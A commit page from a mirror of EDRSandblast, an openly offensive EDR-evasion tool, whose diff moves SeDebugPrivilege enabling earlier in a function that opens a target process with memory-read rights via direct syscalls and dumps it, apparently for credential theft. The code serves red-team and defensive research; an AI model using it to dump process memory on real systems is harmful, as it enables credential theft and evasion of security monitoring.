Mirrors/wavestone-cdt-edrsandblast
1
0
Fork 0
mirror of https://github.com/wavestone-cdt/EDRSandblast.git synced 2026-06-10 17:31:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

SandMiniDumpWriteDump: changed SetPrivilege location for reliable process listing

Browse Source
This commit is contained in:
Maxime Meignan
2023-11-03 19:30:02 +01:00
committed by Maxime Meignan
parent 794dd9c254
commit ea27242fa2
1 changed files with 14 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files
EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c
+14 -13
View File
@@ -371,13 +371,25 @@ DWORD SandMiniDumpWriteDump(TCHAR* targetProcessName, WCHAR* dumpFilePath) {
HANDLE htargetProcess = NULL; HANDLE htargetProcess = NULL;
OBJECT_ATTRIBUTES ObjectAttributesProcess = { 0 }; OBJECT_ATTRIBUTES ObjectAttributesProcess = { 0 };
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
_tprintf_or_not(TEXT("[-] Unable to open process token. Error : %lu\n"), GetLastError());
goto cleanup;
}
if (SetPrivilege(hToken, L"SeDebugPrivilege", TRUE)) {
_tprintf_or_not(TEXT("[+] SeDebugPrivilege enabled\n"));
}
else {
_tprintf_or_not(TEXT("[-] Unable to enable SeDebugPrivilege\n"));
goto cleanup;
}
status = SandFindProcessPidByName(targetProcessName, &targetProcessPID); status = SandFindProcessPidByName(targetProcessName, &targetProcessPID);
if (!NT_SUCCESS(status) || targetProcessPID == 0) { if (!NT_SUCCESS(status) || targetProcessPID == 0) {
_tprintf_or_not(TEXT("[-] Syscall process dump failed: couldn't find target %s process PID\n"), targetProcessName); _tprintf_or_not(TEXT("[-] Syscall process dump failed: couldn't find target %s process PID\n"), targetProcessName);
goto cleanup; goto cleanup;
} }
WCHAR FilePath[MAX_PATH] = { 0 }; WCHAR FilePath[MAX_PATH] = { 0 };
const WCHAR prefix[] = L"\\??\\"; const WCHAR prefix[] = L"\\??\\";
memcpy_s(FilePath, sizeof(FilePath), prefix, sizeof(prefix)); memcpy_s(FilePath, sizeof(FilePath), prefix, sizeof(prefix));
@@ -402,18 +414,7 @@ DWORD SandMiniDumpWriteDump(TCHAR* targetProcessName, WCHAR* dumpFilePath) {
InitializeObjectAttributes(&ObjectAttributesProcess, NULL, 0, NULL, NULL); InitializeObjectAttributes(&ObjectAttributesProcess, NULL, 0, NULL, NULL);
CLIENT_ID clientId = { 0 }; CLIENT_ID clientId = { 0 };
clientId.ProcessId = UlongToHandle(targetProcessPID); clientId.ProcessId = UlongToHandle(targetProcessPID);
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
_tprintf_or_not(TEXT("[-] Unable to open process token. Error : %lu\n"), GetLastError());
goto cleanup;
}
if (SetPrivilege(hToken, L"SeDebugPrivilege", TRUE)) {
_tprintf_or_not(TEXT("[+] SeDebugPrivilege enabled\n"));
}
else {
_tprintf_or_not(TEXT("[-] Unable to enable SeDebugPrivilege\n"));
goto cleanup;
}
status = NtOpenProcess(&htargetProcess, PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, &ObjectAttributesProcess, &clientId); status = NtOpenProcess(&htargetProcess, PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, &ObjectAttributesProcess, &clientId);
if (status == STATUS_ACCESS_DENIED) { if (status == STATUS_ACCESS_DENIED) {
_tprintf_or_not(TEXT("[-] Syscall process dump failed: access denied error while trying to get an handle on the target process (NtOpenProcesserror 0x%x).\n"), status); _tprintf_or_not(TEXT("[-] Syscall process dump failed: access denied error while trying to get an handle on the target process (NtOpenProcesserror 0x%x).\n"), status);